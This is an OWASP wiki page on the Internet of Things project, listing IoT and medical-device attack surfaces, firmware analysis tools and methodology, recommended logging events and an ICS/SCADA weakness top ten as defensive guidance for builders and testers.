| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|<br />
|}{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Firmware Security Testing Methodology =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology (FSTM) is composed of nine stages tailored to enable security researchers, software developers, consultants, hobbyists, and Information Security professionals with conducting firmware security assessments.<br />
<br />
{| class="wikitable"<br />
|'''Stage'''<br />
|'''Description'''<br />
|-<br />
|1. Information gathering and reconnaissance<br />
|Acquire all relative technical and documentation details pertaining to the target device’s firmware<br />
|-<br />
|2. Obtaining firmware<br />
|Attain firmware using one or more of the proposed methods listed<br />
|-<br />
|3. Analyzing firmware<br />
|Examine the target firmware’s characteristics<br />
|-<br />
|4. Extracting the filesystem<br />
|Carve filesystem contents from the target firmware<br />
|-<br />
|5. Analyzing filesystem contents<br />
|Statically analyze extracted filesystem configuration files and binaries for vulnerabilities <br />
|-<br />
|6. Emulating firmware<br />
|Emulate firmware files and components<br />
|-<br />
|7. Dynamic analysis<br />
|Perform dynamic security testing against firmware and application interfaces<br />
|-<br />
|8. Runtime analysis<br />
|Analyze compiled binaries during device runtime<br />
|-<br />
|9. Binary Exploitation<br />
|Exploit identified vulnerabilities discovered in previous stages to attain root and/or code execution<br />
|}The full methodology release can be downloaded via the following TBD. <br />
<br />
{{Social Media Links}} <br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Security Testing Methodology ==<br />
<br />
The Firmware Security Testing Methodology Project provides:<br />
<br />
*Attack walkthroughs<br />
*Tool usage examples<br />
*Screenshots<br />
*Companion virtual machine preloaded with tools (EmbedOS) - <nowiki>https://github.com/scriptingxss/EmbedOS</nowiki> <br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Quick Download ==<br />
* TBD<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=255831OWASP Internet of Things Project2019-10-31T14:38:04Z<p>Aaron.guzman: /* Medical Device Testing */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides, Tools, and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
